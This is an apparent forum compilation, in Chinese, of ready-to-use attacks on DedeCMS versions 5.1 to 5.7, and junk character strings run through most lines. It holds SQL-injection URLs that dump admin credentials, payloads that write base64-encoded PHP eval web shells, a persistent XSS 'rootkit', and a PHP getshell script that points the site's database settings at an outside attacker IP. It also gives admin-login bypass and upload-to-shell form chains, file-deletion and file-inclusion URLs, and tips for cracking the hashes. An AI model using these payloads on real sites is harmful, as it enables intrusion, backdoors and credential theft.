|
|
) x. l8 i3 _4 w* ~; }: R
Dedecms 5.6 rss注入漏洞
6 B: J$ w- n4 q+ l% shttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
/ T0 M3 R; q X1 R# G( l
2 I/ R5 i0 z9 J* ]$ ~: z
9 `& M. N+ Z! P
& Q6 O3 m- j0 N$ T8 X/ S$ y& x& Y4 W# o) U* c& _! n' |* Z
: J' Z% t) R) _, P5 q
4 g3 H! B. R/ K% U' o: ^. ?! j1 b
( G- W; R. y; c
DedeCms v5.6 嵌入恶意代码执行漏洞- L+ ?: Q: M1 ~, D3 _& u8 D
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}4 D" b9 I0 ^1 P& R+ t% }2 Y
发表后查看或修改即可执行4 O3 x7 A/ P Q2 G# {
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}" q d K3 H+ X5 n$ o/ I: M9 G
生成x.php 密码xiao,直接生成一句话。
9 Y7 a9 v0 y% I0 [! Z8 T. D, N4 u' m1 [" J0 s- w/ M
8 q! ]3 F' H$ Z2 @3 \$ S5 K# [" ]
" J" r8 J" M# n. c: g5 h. n: V& p1 u$ k1 Q+ F2 W% J5 o
" S$ ]) |5 P2 I& K3 l' O0 Z0 Q' l# b4 _' h4 J/ A% F
- G+ |8 }) v9 \# X
: I2 }. w% b, L# S' P0 H3 gDede 5.6 GBK SQL注入漏洞" a; z; `2 s D9 ~, m2 L0 P% e0 m7 O
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
1 } o1 k5 ?1 v7 s( ihttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe* t9 X8 q' U) e. C3 h9 `. B- c9 g( u
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
$ _( }/ l4 m% n, ?1 o' _
. i1 X. C5 z1 c2 x5 s1 w
3 c9 ?# H& Q/ s$ h3 P# P
! g' h' X9 O4 U w$ e1 r1 B# g1 p; O+ o: b2 i3 w/ r
" O; N4 ?' @& q
+ D% f9 E. m2 A* P8 b1 v# H9 o
# s0 X9 }& M7 v: v4 [- W6 q6 x# m4 l L) ~ u4 l6 v! D! M6 U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞* u3 Y: o {, G, e
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
# ?* l; K$ `* J' Z1 R, A' |! l# F5 [' Y J: M
+ I7 F3 N2 O) P5 b1 D3 `- R; s: [1 ]6 O6 x6 X8 w
2 T X, t0 F! ^( O3 D- w" X$ E% b- _+ S0 N5 a& S
3 y+ U) k, d. [DEDECMS 全版本 gotopage变量XSS漏洞6 X3 L( ^0 b; N( R/ x3 e0 [
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ; \! o3 S0 Y! U" r. a5 w) l4 a
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=", i* W! ^& v0 @$ {0 u5 u4 K& {
! E2 X% y: L. J Y- p9 F9 t% t( w+ c5 w! h- N$ Q! b. g6 {3 U0 y
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 $ z4 j& m/ c* j) { `
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
- s/ L* p3 O, R+ y, l# {' K% y# w# L/ Q( ~
( i( G! d9 [$ g5 w. L" F) J
http://v57.demo.dedecms.com/dede/login.php5 l5 G& L5 S# h
, S1 M( ^& u1 G& L
$ W7 q* Q) e4 L. P$ ?
color=Red]DeDeCMS(织梦)变量覆盖getshell+ G, x( p( _7 O
#!usr/bin/php -w
1 S1 H, X- M5 S4 F- ~* [: x( J8 d; @& b<?php! @8 y( [0 f/ `$ y) T* ?! v- P8 n
error_reporting(E_ERROR);' F. E# q6 m, T8 k J4 Y
set_time_limit(0);* W0 e7 T9 O1 t: h2 E: H) t% ^
print_r('
5 u) M: h8 i$ _* s& |+ tDEDEcms Variable Coverage7 V: g( d4 S" d
Exploit Author: www.heixiaozi.comwww.webvul.com0 n4 ~0 O7 z( }7 F
);
* e$ q* V+ Y0 m& p, Y( [+ iecho "\r\n";
* T9 T; M8 y H5 P. K" ]+ zif($argv[2]==null){
, v; G& f- x3 I, r6 z/ Uprint_r('
. m' N/ a6 r6 z& a2 h( d+---------------------------------------------------------------------------+: \0 u: |1 c: ~
Usage: php '.$argv[0].' url aid path) L$ r. T4 o9 z! {- g9 i
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
* G$ ^, ?* N: x/ D2 n5 eExample:7 M) o. G& b7 d
php '.$argv[0].' www.site.com 1 old: Q$ p8 l1 c; ?3 t
+---------------------------------------------------------------------------+! V# l5 W8 F# X3 }9 H
');
# j( p, ^- |, h) Z$ Iexit;: \ l+ e# V( m) }( W
}' r4 z) ~1 ]1 i+ n8 a6 x
$url=$argv[1];: ?2 Z: a$ o N2 Y% V- W
$aid=$argv[2];1 O& t: y- W# `5 Z* b0 G( _; ^
$path=$argv[3];
, p$ o7 v$ q2 {7 \; z5 G+ y, Q$exp=Getshell($url,$aid,$path);8 u$ g! R1 p# S1 @" h* ~6 v9 y
if (strpos($exp,"OK")>12){7 }$ |9 T/ p! h, D1 P
echo "
9 H r2 ~3 m9 ?3 oExploit Success \n";
/ t, x" Z' l2 ~2 c0 lif($aid==1)echo "
, f# E- C0 T% z( E( R- w. _Shell:".$url."/$path/data/cache/fuck.php\n" ;% T) e6 D& m3 w# r5 k4 \( X. z
; r( w5 f* g7 G3 [) D2 c! b) r% I, q6 F0 W' `
if($aid==2)echo "+ ~4 I& \! z, y f. E$ s
Shell:".$url."/$path/fuck.php\n" ;0 K' D% F" q8 J8 n! _4 d$ F# ]
; W% y3 j8 {6 d" l6 S1 @9 K) d
/ I( w6 v' O2 e5 |3 j1 M1 ?
if($aid==3)echo "3 E) z$ g9 T3 d n/ o5 _
Shell:".$url."/$path/plus/fuck.php\n";
/ z0 ]' ^0 S* P3 J) y2 o* H
. L. `+ p6 I9 h9 O0 N# q/ [+ A
/ {& o* V: w! n4 r. o}else{
0 L6 h, |5 B( ?5 wecho "
% @) x/ U `$ V3 f: }. ]Exploit Failed \n";/ d: y3 F( G& X5 p8 i
}
5 ~2 S! q" o/ J7 Efunction Getshell($url,$aid,$path){
C2 ~" z5 k' I$id=$aid;" X d$ S# p9 W$ V. B/ x
$host=$url;
" \% S4 z" h5 D: k, T$port="80";6 ^7 w* f! R, l* A7 ^
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";6 g* @$ G Y& K; `1 z
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";9 A( B: B: H) L& }$ t' o& D
$data .= "Host: ".$host."\r\n";
6 k( j; o F( i3 i/ l; V$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
3 b" ^ I8 }& Q# \$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
0 C5 a/ `' s @2 P$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
6 w) e. ^) ~3 ^- E& q$ U//$data .= "Accept-Encoding: gzip,deflate\r\n";
9 A& W' }3 B/ Y5 h$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
t4 ^7 D' |; H) E$data .= "Connection: keep-alive\r\n";
& ], R4 P- }! l2 h' K: ?6 P$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
/ W! _* {4 G' |. n' R* E" T$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
1 T+ m" Z o, {$data .= $content."\r\n";
4 ~6 R% U' j% c$ock=fsockopen($host,$port);! t: Z& y7 y$ J! t, {
if (!$ock) {7 a: L7 L9 d% p8 L& x& c5 m
echo "! b/ h3 [* }; v
No response from ".$host."\n";# w$ b* B/ t3 M3 ~+ m0 d, T% E
}& N/ s) V4 l3 B r6 t- U# x
fwrite($ock,$data);8 U7 X. V4 B ^* ^* m5 G
while (!feof($ock)) {' U. M& J' h2 C" r( B" Y4 s
$exp=fgets($ock, 1024);
) o5 i0 c* } X. E# Q4 {return $exp;& L( Q: B; b1 h
}4 p" f) {7 B% H8 `" Z
}
- s! B0 x. D2 s! e4 O3 g6 P8 M+ W/ c( n6 s
7 Z( Q3 R. l" R+ n?>
( E; Z$ _% t" S# h& \8 l7 m) r# t1 c$ m" L9 c7 }/ r i6 |4 u1 h
! @5 I! z/ V/ R; y$ s+ z* }+ u! l2 _9 h! M
# k+ M. ]# p. q- l. `- z4 u; T: y% h1 M) }8 @
! E. U. s) \3 |: N' ^9 k( O) M9 |1 {' u- N1 t9 ? v
9 r: f5 s* ]* d( L
* ~, E( u& P- K5 d7 {6 l5 e7 s0 F) ~. k' c
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
- r: t- Q* D% i0 thttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
E, T6 K! Y, j0 X& t+ F; o+ r$ h
$ J, V' F6 v& r/ h% G* X3 Z% G, u: M
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
2 l- M" g/ z: H6 `5 E8 W
' Q$ A$ U* S9 f& Z/ H. l
1 s- X. k! U& Q4 [7 z5 v1 |5 d8 Y此漏洞的前提是必须得到后台路径才能实现
/ E Y6 K7 R& o9 Y; r- _" c/ W4 ?/ a6 `- a
9 [' A* U r, a- h% o D
# S. t5 p* \" E* h; a0 g" u, E v
8 K0 H+ a( }) A7 Q% J- ^
6 A( E$ v F G+ {; I( v; Z
. z$ ]# i7 e' I$ m0 Y" |' S) k! W) H8 v8 y" K
6 \4 u: c# B; S# O: C6 p9 a9 V9 d
4 I8 T# J* i- {5 I N& {2 v
9 j( x& N, Z8 v4 H* K/ XDedecms织梦 标签远程文件写入漏洞
+ H* s4 \% V4 }3 V* n6 I前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');# L5 l$ ?2 c% r" i
% Y- }4 K% C L/ H' W% Y. v
4 A H, G( a. Y. m2 z& z$ F) V再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
! l H; G- r" s B! Z2 y, z<form action="" method="post" name="QuickSearch" id="QuickSearch">
, N8 i6 ]' p4 w! g0 p& V# S: h<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
% Y z" y# q7 w+ j1 S' W0 t( a<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />& A0 R$ G( ]# ^% g) I# n
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" ~( a) w5 S3 u; {- g$ H<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /># o1 w. q2 h+ g. M3 L
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />+ Z7 }% {6 ~/ C$ @2 Z: }; c
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 [6 t/ J9 z4 d- J6 F<input type="text" value="true" name="nocache" style="width:400">" Z a3 q Q+ V/ R
<input type="submit" value="提交" name="QuickSearchBtn"><br />
' G' @1 t; F- \; U% F9 T</form>
% g, ?- J# @. L) b( u<script>
$ p( W) W7 G; t, gfunction addaction()8 P9 @% G: D6 @6 ^3 o
{- Z& V- \3 W) S' |" o( b! ?: n! ]$ y3 [
document.QuickSearch.action=document.QuickSearch.doaction.value;
* p: ~& X9 s4 G% H q/ s2 s# R' ?}$ b$ L6 ~& Z d$ T# K
</script>
. }0 K# B. b# n R" q A8 l4 E& k
2 @+ c3 J q% B% m8 i+ \& x' R% u( v
$ F: l* D% |3 |% V1 O( O! _, I8 G+ Z( R! ]$ W5 n
$ C q& T; A, }$ z
) |$ f' {$ r8 J8 ]/ E* ]7 P' |: ]' j7 g6 A- A+ a1 Z
8 ^' _0 `' R8 z; T& P
. T+ g+ ^2 ^% a5 Y ?
7 e6 }% Y, z. N* z
9 O# G! R G& e# u6 M! }$ nDedeCms v5.6 嵌入恶意代码执行漏洞5 l% O7 _4 v+ o# c9 V% _
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行3 n# ]! o. n8 T6 q( S' `% r* A, R
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 x: f4 Q& j* o0 @. ^4 h7 a/ _
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得( m" w. L) U6 f+ [0 x% r$ g
Dedecms <= V5.6 Final模板执行漏洞
+ ?4 C0 G/ N- T, T& T% i注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
s$ }; L! g0 G- f0 x* kuploads/userup/2/12OMX04-15A.jpg; L0 R% w: g# u; Q5 Q
) p5 x3 x4 f( j; |9 ?2 K
" d- p4 O, o' R [) ?- l6 U
模板内容是(如果限制图片格式,加gif89a):
# h! ?6 c8 [$ L7 J) E7 ]4 g{dede:name runphp='yes'}" v9 y6 ~) _8 [
$fp = @fopen("1.php", 'a');
$ o0 S$ {" P' |+ g( K6 B* i: U@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");6 d$ o. `4 `( Z: n. g% W& r- L
@fclose($fp);( k$ P: j; t/ \' z. i
{/dede:name}
! R) u: V, U+ T2 修改刚刚发表的文章,查看源文件,构造一个表单:' H( E' X( S9 m" x0 W, b4 [
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
" @3 L- h: g7 D( Z<input type="hidden" name="dopost" value="save" />" ^4 ~! m- r9 ^( T% J- s4 i) D
<input type="hidden" name="aid" value="2" />' \! z" q% g9 z; c7 r+ [' K
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
& \8 X% J- Z# O! F3 m0 f. t1 B<input type="hidden" name="channelid" value="1" />, _5 h5 [1 i( q g
<input type="hidden" name="oldlitpic" value="" />
5 ~1 j0 M0 \7 d# K. w<input type="hidden" name="sortrank" value="1275972263" />+ o! x7 W. p7 C, y6 U+ }
% f9 o5 x% q& b6 }3 T8 I. S( ^0 K/ _& k, D4 V
<div id="mainCp">
3 x4 S/ A5 F: D- W- ?0 V6 ^<h3 class="meTitle"><strong>修改文章</strong></h3>& b, f, a j/ \% ~
9 G5 m8 C4 d) b0 k7 a) `+ r
' Y$ [( G) U0 B' o- D% W<div class="postForm">
- X" H6 {# c+ q, }<label>标题:</label>( M6 `$ b3 `& Q$ I: w# [* T
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
+ _" L/ W4 I, l% Q$ P/ O" k' [' m _, f& n9 s9 E/ B
: [" s# ?+ a, F2 d% H: ^: [<label>标签TAG:</label>
7 f R0 b% c4 Y5 ~/ W) C<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)" b, v, {5 ^. O& \% h6 ^! F2 n
; E$ \$ l- Z$ j) t4 G6 `( _+ G. C2 ^1 z* F* l1 W% y
<label>作者:</label>$ R: F& C8 \; @+ N. y% ~3 `& u
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
& {+ z& p& q3 O8 a- a
6 j* e3 M" K9 z3 Q& Q& `4 W5 o: i. {* r3 H, [& W
<label>隶属栏目:</label>
/ H& W, ~' b, s+ Y7 U! j6 c<select name='typeid' size='1'>6 ^. t' E" j& [0 r
<option value='1' class='option3' selected=''>测试栏目</option>2 v' t" q: h* U4 }) P) y
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
. m- b; M2 f2 t, b9 `7 s0 m) M' F6 L: d
5 h) P O# ]8 Q w
<label>我的分类:</label>: M1 |: B" h" k7 ]" |5 S) Q, D7 c
<select name='mtypesid' size='1'>
* q& w% e6 Q7 b* y4 r% {1 n<option value='0' selected>请选择分类...</option>
) `; b% T' q2 r# [, y! B<option value='1' class='option3' selected>hahahha</option>2 C6 q$ J1 T, O' e( _5 ?) H( t
</select>* @# Y8 g C8 v7 w" B. y
# Y) m4 R. Z: T6 \3 J& k3 m
1 R1 p4 R, J, n# d# p, Y3 y
<label>信息摘要:</label>
6 r! L) ^) A9 I- u<textarea name="description" id="description">1111111</textarea>
: i6 Q& U d' Q6 T; X(内容的简要说明)+ ^6 X' h6 w$ U X, @/ ?$ _) @4 ]* L
1 \& S8 r0 |" |3 K K: k" c5 d/ B4 Y+ G6 H. ~
<label>缩略图:</label>
" S. G# K1 u' A) A4 C<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
% u& `# d& J% ~/ c$ j! j+ v
* y9 f4 \3 S& p. s& ^ G# ?# f" D% R0 `: K$ ~6 |; ?. h
<input type='text' name='templet'% K9 f$ X% E( ]
value="../ uploads/userup/2/12OMX04-15A.jpg">
9 K. ^; c' Q* W9 h& [5 e<input type='text' name='dede_addonfields'% W& v9 b6 ]; Q
value="templet,htmltext;">(这里构造)% }. K Z1 G% u' u
</div>
5 j$ A; O$ ^: s/ L
( U" D) J# i8 @! E& y2 B: }/ l. R0 |' G& |; W& w- v
<!-- 表单操作区域 -->& U/ H2 R/ Q1 _5 u7 U% {4 R$ A
<h3 class="meTitle">详细内容</h3>4 k' I6 b. U1 _
5 M9 E& J* W/ H
: Z6 j0 b, Y/ B2 O( h<div class="contentShow postForm">
$ y& @4 Y! _% o2 L<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
- Y- L* T" h' n5 ~* V/ \* F+ e9 I* r- R; U$ X" Y1 m O
3 a* B0 s' ?5 ^0 l' g8 g<label>验证码:</label>
: ^+ Q4 u1 f, P3 u, l<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />9 Q: i* q- G+ U* u) j/ `; i
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />! d' X Y# Q8 c8 z: ?1 p5 C5 ^+ L
4 v9 g* B* T5 ^, R, V l
) n4 t" a9 ^0 s! T3 B1 u1 X2 u& I<button class="button2" type="submit">提交</button>
O% f8 f: ^! B: q. Y+ N<button class="button2 ml10" type="reset">重置</button>
$ x3 u/ q4 Q7 A* W& @( l( G$ d</div>
, S2 W- I' H* Z0 P
/ Q6 H) D& H" D! z" W
. E; t- ?# h: J$ I0 \</div># i6 u$ m+ @( q C; N' _
& K% Q1 U0 z/ w# M: K: ?. ]# x4 O
* Y6 ^/ D$ |% P7 M/ m7 _+ i
</form>. Y, l% \. X0 |% O) T8 M2 A" a
/ ^- e0 y" }8 `# e1 w
1 N3 n6 d2 ]1 d
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:) K. j, T; k* Z0 A/ O0 K: Y3 k! ^! g
假设刚刚修改的文章的aid为2,则我们只需要访问:* H& ? O L6 u1 X6 ]
http://127.0.0.1/dede/plus/view.php?aid=2
+ V& I3 t8 K& M1 I8 a1 b7 s即可以在plus目录下生成webshell:1.php/ }8 g+ a# a6 g' `
7 K3 V7 k5 ? w8 i
3 N+ H' _" {4 C; O- n0 b' y) ^0 \ b6 d6 @3 P5 U9 K
; w" F" C* k4 ]( o. y; w) t1 a. L0 L: b+ \5 T' m0 x0 L; \& q9 r
+ `# x* K& L/ d
: z: Z4 D- T+ h2 i( ]# z
2 `$ ]5 J# E+ Y- B& B) H7 w6 B
& i7 @, O0 {- t- B/ k! A l9 E- n& R% y) M& h5 C
, I; ~! z2 j, I
2 p. c1 a, D+ \% o- q6 Y
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
, A+ x& Q& b# |6 UGif89a{dede:field name='toby57' runphp='yes'}2 J2 [1 |2 w0 ~. O- G% f
phpinfo();9 e; Y ^$ ~! j6 Q; @
{/dede:field}: v* L9 ]2 _: Q( {+ Z# X: w
保存为1.gif
1 J' p3 }! X8 S<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 1 Q& a4 j3 C1 X5 v, X) A; X1 n9 z
<input type="hidden" name="aid" value="7" /> 1 d4 |$ D5 ~' m4 Q
<input type="hidden" name="mediatype" value="1" />
0 r9 B1 q( [/ A5 I$ v% |<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ! t* [4 H$ d: u9 g5 @
<input type="hidden" name="dopost" value="save" /> 8 |' Q0 W7 H8 X: Y6 d- h9 Z4 q) Q' ~
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
& Q3 E2 i9 @) X+ o2 W<input name="addonfile" type="file" id="addonfile"/>
/ h' s- Z* ~' w<button class="button2" type="submit" >更改</button> 5 ?( P* \7 P% l) [* P
</form>
6 W! q- z+ G/ c' e1 U5 C1 T( ` S9 \9 ]) Y, B/ e* s* `/ d
5 T! W9 e6 {3 D4 R- f5 P2 k J5 g
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif0 g1 B7 y% o3 R) x3 r% x
发表文章,然后构造修改表单如下:
2 `; \2 c3 L5 h7 u$ V5 S! O9 P/ T3 _5 v. d% ~, N
2 A" j& T/ |6 q/ U2 x) ?7 F
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
9 o) Y* ~* B; X* q/ L<input type="hidden" name="dopost" value="save" />
9 v. G6 D; F, |/ B& y<input type="hidden" name="aid" value="2" />
2 S) o6 v5 @% ^* Z, V2 H- M4 w8 o3 s<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
' @& [" G, v; \* l: F<input type="hidden" name="channelid" value="1" /> 8 w9 K! K) N P; k2 C8 k
<input type="hidden" name="oldlitpic" value="" />
: B ~& l c5 _, C% Q y<input type="hidden" name="sortrank" value="1282049150" /> 6 p% }& j3 @. K/ n7 z9 ^' A* k- r7 N7 K
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
2 z- a+ V8 L; c" G" B; D: e<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> + U3 B; }9 W9 J( i& z$ ~
<select name='typeid' size='1'>
5 u9 Y& `: k/ _6 U( P8 ?; f( W<option value='1' class='option3' selected=''>Test</option>
9 Q0 Q- n- {* j& t<select name='mtypesid' size='1'>
. U0 o8 I: o" m1 |$ ^, j, d<option value='0' selected>请选择分类...</option>
, G1 v, I9 M4 s<option value='1' class='option3' selected>aa</option></select> 8 H5 L6 K2 f6 \# R
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> / l8 C' u" ? {5 R
<input type='hidden' name='dede_addonfields' value="templet"> 7 e& w H9 m/ h v* a& k# f
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
/ O+ ^2 n9 u6 ?3 k. d<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 1 p" d6 L" R0 v" k4 X
<button class="button2" type="submit">提交</button>
9 O! h/ Q Q/ i- F' v' v" }4 I" M</form>
* [! E) v. A# c! u
* a* b8 a$ G. z/ d4 j
. n @9 _* W* L. X; A* k9 [: G- _6 _1 Q0 ~" Z" [; ?1 y% f) l
, _- u( v' x6 `4 h
/ V+ O3 ~* C: I7 [
1 U+ s$ b. b( p" z6 f" Y8 n! O2 _7 L/ \0 t( S1 X% _
, N5 e8 z" d7 P: ~) A- x+ T, i4 z! T
1 p: N7 V! x' B" q, s' o/ f O
^1 `0 N* r# R2 e5 f a- \
2 P4 ]% ~, m# x5 w' R/ k; F1 ?' I织梦(Dedecms)V5.6 远程文件删除漏洞
* a2 v& O7 F S: N' \http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 D% r, e) }! Q) ]
3 o7 y$ w1 B4 o6 H: I
7 K) L6 e( s8 V: N. F8 a8 P" _' g* E5 f% B3 ^0 x m9 E
2 D! \( W; H5 I* P) U a/ @
& s- ?( B; k/ v( Q
+ n5 T6 J2 y2 W6 C- z$ h* u6 f! R; m2 w# q. J: H# y
: f) D; T6 X3 w9 ~1 h7 e
0 I2 T$ L! J/ K: e9 b( O# O; D- P! E0 k/ Q3 ]% p( [2 M
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 1 b: n6 j2 c$ X" x( O& w4 G4 v# \
http://www.test.com/plus/carbuya ... urn&code=../../& q ]: p5 a8 r/ K; t8 J# s4 Y8 @
; Y t4 T1 O5 n5 h& U+ `
8 T7 y+ h( k( W" x3 b9 k! j: K- q1 l( T$ v
( {) m5 R3 i" E- v8 B* t
+ u$ H% c3 V+ k9 f6 {( p
+ K4 D! b) T" V c8 m
- `1 t0 v2 g: ]+ \' T4 T1 N N! x/ \1 R
+ \, u; V6 \6 n3 R- N1 `
/ B- W: x# d% c# zDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ) J2 ?) D9 C$ L, A+ _ N
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 J- B; L2 Q8 s6 ?1 V
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5% L$ n9 r4 }" K6 F+ J. s
) b+ i& @0 Y) _. S. z
9 x( r. J: T8 y( N1 I! l
, I- W' z: }, \0 e& j
& P& C- R* Q" s# ]7 Q# `. l. |
8 [% H+ u; t s3 \/ v, ~) Z+ W" ]) p2 s
: C# Q4 a; g3 x& j
0 @+ `1 v8 U1 [* y+ `( h$ K
1 J( o z# b. {0 Y+ G
" _) a9 G6 ]" c5 q* k
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
1 B s1 D! q4 E; z2 J+ ghttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=') g+ n6 q$ x6 C6 ^+ t
2 Z; d( @& x! W8 o2 o
- o3 R$ @6 ]9 ^# r+ B! [3 o2 {% g9 _4 ^, [2 l$ d
8 i- A0 N. g4 }. C) k% I1 X4 v
7 E, i' d6 S% m* r$ R
